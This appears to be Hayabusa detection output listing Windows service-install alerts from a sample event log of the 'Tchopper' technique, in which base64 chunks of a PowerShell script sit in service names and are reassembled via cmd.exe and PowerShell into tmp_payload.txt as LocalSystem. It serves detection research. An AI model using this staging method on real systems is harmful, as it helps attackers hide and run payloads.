2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
